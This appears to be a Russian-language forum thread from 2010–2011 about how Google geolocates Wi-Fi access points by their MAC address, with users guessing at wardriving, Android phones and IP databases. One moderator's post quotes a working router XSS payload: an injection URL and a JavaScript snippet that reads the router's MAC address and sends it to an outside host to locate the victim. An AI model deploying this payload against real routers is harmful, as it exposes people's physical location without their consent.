Определение положения wi-fi сети гуглом

НО КАК???
 
1 2 3
+
-
edit
 

Cormorant

опытный
★☆
BrAB> вбиваете мак своей wi-fi точки - и с некоторой вероятностью она показывает с точностью до дома. Меня эта штука нашла - с точностью до дома.


вбил.
нашла показала недалеко от места старого офиса.
а мы оттудова в августе уже как съехали

и провайдер другой
Cormorant, qui alte volat late - volat praeteritum  8.0.552.2248.0.552.224
RU Kernel3 #29.12.2010 14:42  @Cormorant#29.12.2010 14:41
+
-
edit
 

Kernel3

аксакал

Cormorant> а мы оттудова в августе уже как съехали
Cormorant> и провайдер другой

Значит, точно запоминает после первого определения. И критерии обновления не проработали ещё :F
Broken Windows® cures my ills and makes me feel alright... ©  

Floyd

аксакал

Balancer>> Да, прикольно. Дом определился :)
BrAB> есть более подробные идеи - как? и нет ли знакомых в других городах с wi-fi? интересно - работает ли это там
Ахренеть, в Рязани показал с отклонением метров в 10 :eek:
 3.6.133.6.13

Floyd

аксакал

Вы тут говорите об определении координат на основе времени прохождения пакетов с известных точек. Но ... как жеж они умудряются "пингануть" меня по MAC адресу, задается ведь не IP, а MAC. При этом у меня параноидальная настройка точки доступа с контролем доступа по МАС-у и ограничением числа подключений.

У меня только лишь одно предположение, что данные о МАС и координатах получены с передвижного сканера, по моему вардрайвинг называется, но блин неужели гугл катался по Рязани !!!?
 3.6.133.6.13
+
+2
-
edit
 

marata

Вахтер форумный
★☆
Меня не нашла. Слава Минатому :D
 3.6.133.6.13

Kernel3

аксакал

Floyd> Вы тут говорите об определении координат на основе времени прохождения пакетов с известных точек. Но ... как жеж они умудряются "пингануть" меня по MAC адресу, задается ведь не IP, а MAC.

А зачем нужен именно IP? Достаточно 802.11 с MAC и SSID. Без установки соединения.
Broken Windows® cures my ills and makes me feel alright... ©  

Floyd

аксакал

Floyd>> Вы тут говорите об определении координат на основе времени прохождения пакетов с известных точек. Но ... как жеж они умудряются "пингануть" меня по MAC адресу, задается ведь не IP, а MAC.
Kernel3> А зачем нужен именно IP? Достаточно 802.11 с MAC и SSID. Без установки соединения.

Т.е. ты думаешь что вокруг меня стоят фиксированные WiFi точки которые постоянно сканируют весь диапазон? Маловероятно, особенно с учетом этого:

вбил.
нашла показала недалеко от места старого офиса.
а мы оттудова в августе уже как съехали

и провайдер другой
 
 3.6.133.6.13

Kernel3

аксакал

Floyd> Т.е. ты думаешь что вокруг меня стоят фиксированные WiFi точки которые постоянно сканируют весь диапазон? Маловероятно, особенно с учетом этого:

А прочитать всю тему внимательно? :F
Broken Windows® cures my ills and makes me feel alright... ©  

Floyd

аксакал

Kernel3> А прочитать всю тему внимательно? :F

Нэверю ! :) Имхо это данные с мобильного сканера.
 3.6.133.6.13
+
-
edit
 

Balancer

администратор
★★★★☆
Хех. Wi-Fi... Я гуглю тут разрешил показывать мне, где я нахожусь (это я в такой формулировке, так как знать, где я бываю, он итак знает, пока у меня Google Locator не запрещён на коммуникаторе), так он уже вычислил, где у меня дом и работа :) Чисто по GPS... Дом - точный адрес. Работа - примерный район.
 
+
-
edit
 

hnick

аксакал

Balancer> Чисто по GPS... Дом - точный адрес. Работа - примерный район.

и номер квартиры? :)
 3.6.133.6.13
+
-
edit
 

Balancer

администратор
★★★★☆
hnick> и номер квартиры? :)

Это пока им не по силам. Но технологии не стоят на месте, да...
 
US Сергей-4030 #27.01.2011 18:20  @Татарин#29.12.2010 00:39
+
-
edit
 

Сергей-4030

исключающий третье
★☆
админ. бан
BrAB>> и нет ли знакомых в других городах с wi-fi? интересно - работает ли это там
Татарин> В Таллине работает.
Татарин> Но меня несколько напугало другое: эта же скотина точно (с точностью до 20м, до подъезда, а у меня в подъезде четыре квартиры) определила местоположение моего стационарного компа. Это означает, мой провайдер сливает мои точные координаты моего клиентского оборудования напрямую в гугл, со всеми вытекающими.

Сумлеваюсь я чо то. Скорее я поверю, что гуглемобиль когда ездит, собирает информацию о встреченных wi-fi-ях. А когда информации по вай-фаю не найдено (тока купленный), то тогда смотрит по IP. Получается грубее, конечно.
 8.0.552.2378.0.552.237
RU Balancer #27.01.2011 18:25  @Сергей-4030#27.01.2011 18:20
+
-
edit
 

Balancer

администратор
★★★★☆
Сергей-4030> Скорее я поверю, что гуглемобиль когда ездит

Что-то я не уверен, что гуглемобиль раскатывает по российским городам, да ещё достаточно регулярно :)

Скорее всего, как было раньше предположен, роль гуглесканера выполняют юзеры с Андроидами при разрешении в нём соответствующей опции.
 
US Сергей-4030 #27.01.2011 18:25  @Cormorant#29.12.2010 14:41
+
-
edit
 

Сергей-4030

исключающий третье
★☆
админ. бан
Cormorant> и провайдер другой

Во, ЧТД. Однажды вай-фай засканировали и теперь показывают. Между прочим, это ведь не проблема, извините. Наняли такси, поставили приемник и ездите по городу, ловите APы. Или даже в с еачальством таксопарка/автобусного/трамайного депо договорились и положили в автобус рейсовый коробку.
 8.0.552.2378.0.552.237
US Сергей-4030 #27.01.2011 18:27  @Balancer#27.01.2011 18:25
+
-
edit
 

Сергей-4030

исключающий третье
★☆
админ. бан
Сергей-4030>> Скорее я поверю, что гуглемобиль когда ездит
Balancer> Что-то я не уверен, что гуглемобиль раскатывает по российским городам, да ещё достаточно регулярно :)

На нем не обязательно написано "гуглемобиль". А так - не вижу проблемы.

Balancer> Скорее всего, как было раньше предположен, роль гуглесканера выполняют юзеры с Андроидами при разрешении в нём соответствующей опции.

Да, так, конечно, тоже можно.
 8.0.552.2378.0.552.237
RU Balancer #27.01.2011 18:33  @Сергей-4030#27.01.2011 18:27
+
-
edit
 

Balancer

администратор
★★★★☆
Сергей-4030> А так - не вижу проблемы.

Проблема в том, что гуглемобиль далеко не во все дворы элементарно въедет. А уже с той же Ленинградки, мало того, что до моего дома, скажем, вряд ли дотянется (а пешеходы проходят раза в четыре ближе), так ещё расстояние будет таким, что уже возможна путаница, с какой стороны дороги ловится сигнал.

Практика же показывает, что угадывается результат у многих очень уж хорошо :)
 
US Сергей-4030 #27.01.2011 18:39  @Balancer#27.01.2011 18:33
+
-
edit
 

Сергей-4030

исключающий третье
★☆
админ. бан
Balancer> Практика же показывает, что угадывается результат у многих очень уж хорошо :)

Согласен, Андроидами сканить удобнее, да. На самом деле интересно, как оно все ложится на законы.
 8.0.552.2378.0.552.237
EE Татарин #27.01.2011 18:46  @Balancer#27.01.2011 18:25
+
-
edit
 

Татарин

координатор
★★★☆
Balancer> Скорее всего, как было раньше предположен, роль гуглесканера выполняют юзеры с Андроидами при разрешении в нём соответствующей опции.
Нет там таких опций... так что без разрешения владельцев, похоже.

Да, идея, конечно мощная (практически - идеальный способ), но осадочек... гм, да.
Херофобия - это иррациональный, неконтролируемый страх или тревожное переживание в момент предстоящего, а также существующего веселья. А вовсе не то, о чём Вы подумали.  8.0.552.2378.0.552.237
RU Balancer #27.01.2011 18:54  @Татарин#27.01.2011 18:46
+
-
edit
 

Balancer

администратор
★★★★☆
Татарин> Нет там таких опций...

Народ говорил, что есть :) То ли когда Wi-Fi включаешь, то ли ещё что-то - запрашивает, мол, можно ли Гуглю отсылать данные. Правда, именно про определение сторонних Wi-Fi точек прямо не говорится, но под вопрос подходит :)

Понятно, что это с чужих слов, у самого Андроида нет пока.
 
EE Татарин #27.01.2011 19:08  @Balancer#27.01.2011 18:54
+
-
edit
 

Татарин

координатор
★★★☆
Balancer> Народ говорил, что есть :) То ли когда Wi-Fi включаешь, то ли ещё что-то - запрашивает, мол, можно ли Гуглю отсылать данные.
Сейчас вот перерыл всё - не нашёл.

Но зато прочитал соглашение о конфиденциальности Гугл, и там это оговорено. :)
Херофобия - это иррациональный, неконтролируемый страх или тревожное переживание в момент предстоящего, а также существующего веселья. А вовсе не то, о чём Вы подумали.  8.0.552.2378.0.552.237
RU Balancer #27.01.2011 19:17  @Татарин#27.01.2011 19:08
+
-
edit
 

Balancer

администратор
★★★★☆
Татарин> Сейчас вот перерыл всё - не нашёл.

В какой-то теме, где это обсуждалось, народ явно упоминал запрос с подтверждением :) Но где - сейчас не нагуглил.

Татарин> Но зато прочитал соглашение о конфиденциальности Гугл, и там это оговорено. :)

Зато, вот, попались отзывы, понижающие вероятность использования гуглемобиля:

я сильно сомневаюсь, что до моего зажопинска (1500 километров от ДС) уже добрались гугломашины. вариант с тем, что MAC-адреса WiFi точек собирают гугло-карты (которые к тому же по GPS и по сотовой сети определяют координаты) более правдоподобен.

...

Почему сервис определил точку доступа, которая ходит в и-нет, через роутер, которого в базе нет? Физическое сканирование города? Пативен заезжает даже в переулки спального района?

...

К тому же с абсолютно любой дороги мой WiFi не поймать, роутер стоит в глубине квартиры, не особо мощный и на ноуте, напримре, не ловится даже под окнами или в подъезде.
 
 
US Mishka #31.01.2011 00:22  @Сергей-4030#27.01.2011 18:20
+
+1
-
edit
 

Mishka

модератор
★★☆
Google Wi-Fi компьютеры координаты паранойя
Сергей-4030> Сумлеваюсь я чо то. Скорее я поверю, что гуглемобиль когда ездит, собирает информацию о встреченных wi-fi-ях. А когда информации по вай-фаю не найдено (тока купленный), то тогда смотрит по IP. Получается грубее, конечно.

Тут совокупность. У Браба в первом посте ссылочка на сайт с объяснениями...
Первое XSS injection с Ajax — почему с Ajax — это просто такой объект в JavaScripte, который позволяет организовавыть сессию (и с довольно высоким уровнем — можно на уровне HTTP, можно на уровне XML, можно свой протокол) в невидимом режиме. Я в PNC банке так данные передавал в LendingTree, местные вещи, в том числе для всяких DealerTrack и RouteOne. Более того, Amazon продаёт банкам инфу, где привязан настоящий платёжный адрес к IP адресу. Далее, суть состоит в том, что сайт посылает тебе HTML с JavaScript Code в котором стоит этот скрипт. Потом это скрипт коммуникирует с раутером, поставляя ему в URL ещё один JavaScript — у Сэма есть такая ссылочка:
code text
  1. http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E

Заметь на строчки между словечками script. Сам скрипт выглядит так:
code text
  1. var xmlhttp =  new XMLHttpRequest();
  2. xmlhttp.open('GET', '/index.cgi?active%5fpage=9124&req%5fmode=0&mimic%5fbutton%5ffield=goto%3a+9124%2e%2e&button%5fvalue=9124', true);
  3. xmlhttp.onreadystatechange = function() {
  4.         if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
  5.         {
  6.                 var mac = xmlhttp.responseText.substr(xmlhttp.responseText.indexOf('00:21:63'), 17);
  7.                 mac = mac.replace(/:/g, '-');
  8.                 document.location = 'http://samy.pl/mapxss/fiosmap.php?mac=' + mac;
  9.         }
  10. }
  11. xmlhttp.send();


Такой простенький Ajax c XMLHttpRequest объектом — основой Ajax-а. И этот скрипт уже инжектет внутрь сервера на раутере, если он XSS vulnerable, в этот момент уже пофиг, если раутер спрашивает пароль. Скрипту это уже не надо. Скрипт получает MAC Address. А потом в дело вступает Гугль.
У Гугля есть те самые автомобили, которые ты упомнул. Плюс гугль использует базу от хаккеров, которые выполнили mapping WiFi на адреса. По США почти полные карты доступны. Очень много сделано по Европе, России, Китаю и Австралии. Но не всё. Такие базы можно найти на разных сайтах. Mapping Wireless Routers

Кроме того, у Гугла стоят разные точки во многих местах с известным адресом. Ну и пользуются они открытыми, вроде, тоже. Хотя тут я на 100 процентов не уверен. Далее, как уже давал ссылку Kernel3 — с разных открытых точек можно померить силу сигнала. Ну и с андроидов можно снимать силу сигнала и MAC адреса доступных WiFi, которые кладутся в БД. Всё. Никакой фантастики, только методичный сбор инфы и её обработка. Да у имена у многих провов больших у промежуточных раутеров соотвествтующие. Например:
code text
  1. C:\>tracert www.google.com
  2.  
  3. Tracing route to www.l.google.com [72.14.204.103]
  4. over a maximum of 30 hops:
  5.  
  6.   1     1 ms    <1 ms    <1 ms  Wireless_Broadband_Router.home [192.168.1.1]
  7.   2    24 ms     4 ms     4 ms  L100.PITBPA-VFTTP-34.verizon-gni.net [173.75.30.1]
  8.   3    13 ms     4 ms     4 ms  G1-0-7-334.PITBPA-LCR-03.verizon-gni.net [130.81.140.106]
  9.   4    12 ms    11 ms    12 ms  so-15-3-0-0.LCC1-RES-BB-RTR1-RE1.verizon-gni.net [130.81.28.204]
  10.   5    17 ms    17 ms    24 ms  0.so-3-2-0.XT1.DCA6.ALTER.NET [152.63.39.169]
  11.   6    27 ms    14 ms    14 ms  0.xe-7-0-2.XL3.IAD8.ALTER.NET [152.63.32.230]
  12.   7    15 ms    14 ms    24 ms  TenGigE0-6-1-0.GW7.IAD8.ALTER.NET [152.63.32.194]
  13.   8    67 ms    47 ms    49 ms  google-gw.customer.alter.net [152.179.50.106]
  14.   9    19 ms    14 ms    14 ms  216.239.46.248
  15.  10   184 ms    23 ms    24 ms  66.249.94.46
  16.  11    15 ms    17 ms    14 ms  iad04s01-in-f103.1e100.net [72.14.204.103]
  17.  
  18. Trace complete.
  19.  
  20. C:\>


Точки 2 и 3 тебе ничего не напоминают? :) PITBPA — Pittsburgh, Bethel Park. :) VFTTP указывает на конкретный район, который обслуживается конкретным концентратором. В точке 4 RES обозначает Residential. Бизнес ребята имеют другое расширение. Данные я собрал, работая напрямую с routing group, которой помогал выгрести ошибки. Так сказать, social engineering. :F
 3.6.133.6.13
US Сергей-4030 #31.01.2011 00:30  @Mishka#31.01.2011 00:22
+
-
edit
 

Сергей-4030

исключающий третье
★☆
админ. бан
Mishka>Более того, Amazon продаёт банкам инфу, где привязан настоящий платёжный адрес к IP адресу.

Вот об этом я вовсе не думал. По этому, да, можно детализировать очень серьезно. Когда я на айпаде смотрю карту, мое местоположение находится с точностью до дома (т.е. метров 40 максимум). Конкретно меня обнаруживают в доме соседа. Да и по всему прочему - даже и не думаешь поначалу о таких штуках.
 8.0.552.2378.0.552.237
US Mishka #31.01.2011 00:37  @Сергей-4030#31.01.2011 00:30
+
-
edit
 

Mishka

модератор
★★☆
Сергей-4030> Вот об этом я вовсе не думал. По этому, да, можно детализировать очень серьезно. Когда я на айпаде смотрю карту, мое местоположение находится с точностью до дома (т.е. метров 40 максимум). Конкретно меня обнаруживают в доме соседа. Да и по всему прочему - даже и не думаешь поначалу о таких штуках.

Ну, на этом строилась одна из фич fraud protection. Как раз делали, когда я ушёл. Точнее ещё делают. Всякое application for credit через это прогоняют. А то тут местная китайская мафия изобрела способ — приходила к китайцам и засталяла их брать кредиты под дулом пистолета, забирали деньги, а люди потом платили. Поймали на том, что с одного адреса пришло несколько апликаций на разные имена. Стукнули в ФБР. Тех быстренько оприходовали.
 3.6.133.6.13

1 2 3

в начало страницы | новое
 
Поиск
Настройки
Твиттер сайта
Статистика
Рейтинг@Mail.ru